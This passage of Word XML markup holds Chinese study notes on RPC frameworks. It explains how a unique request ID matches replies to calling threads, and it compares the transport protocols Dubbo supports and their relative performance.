      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>处理完结果后，将结果消息发送给</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>client</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>client</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>收到很多消息，怎么知道哪个消息结果是原先哪个线程调用的？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="301" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>答：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使用一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，让其唯一，然后传递给服务端，再服务端又回传回来，这样就知道结果是原先哪个线程的了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="301" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="301" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这种做法不是第一次见了，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>年在上一公司里，也是远程接口调用，不过走的消息中间件</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rabbitmq</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，同步调用的原理跟这类似，详见：</w:t>
      </w:r>
      <w:hyperlink r:id="rId300" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="6AA50D"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t xml:space="preserve">rabbitmq </w:t>
        </w:r>
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="6AA50D"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>学习</w:t>
        </w:r>
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="6AA50D"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>-9- RpcClient</w:t>
        </w:r>
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="6AA50D"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>发送消息和同步接收消息原理</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00A368BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00A368BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009459C6" w:rsidRPr="00F41A4C" w:rsidRDefault="007F5EC9" w:rsidP="007F5EC9">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>.4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="009459C6" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009459C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dubbo</w:t>
      </w:r>
      <w:r w:rsidR="009459C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议区别</w:t>
      </w:r>
      <w:r w:rsidR="00961773">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与选择</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B6788" w:rsidRDefault="001B6788" w:rsidP="00A368BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3F3F3F"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="3F3F3F"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>参考地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="3F3F3F"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6788">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId301" w:history="1">
        <w:r w:rsidRPr="002801AB">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://itindex.net/detail/49353-dubbo</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001B6788" w:rsidRPr="003561AC" w:rsidRDefault="001B6788" w:rsidP="003561AC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="003561AC" w:rsidRDefault="00563593" w:rsidP="003561AC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Dubbo</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>支持多种协议，如下所示：</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    Dubbo</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>    Hessian</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>    HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>    RMI</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>    WebService</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>    Thrift</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>    Memcached</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>    Redis</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这些协议在</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Dubbo</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用中有什么区别该如何选择？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00764E54" w:rsidRPr="003561AC" w:rsidRDefault="00764E54" w:rsidP="003561AC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Dubbo</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议基于</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实现，</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Hessian</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>WebService</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实现</w:t>
      </w:r>
      <w:r w:rsidR="001C3386" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C54EA" w:rsidRPr="003561AC" w:rsidRDefault="001C3386" w:rsidP="003561AC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RPC </w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>远程过程调用协议</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>它是一种通过网络从远程计算机程序上请求服务而不需要了解地城网络技术的协议。</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00C86281">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007C54EA" w:rsidRPr="003561AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>RMI &gt; Httpinvoker &gt;= Hessian &gt;&gt; Burlap &gt;&gt; web service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003561AC" w:rsidRPr="003561AC" w:rsidRDefault="003B758D" w:rsidP="003306A0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
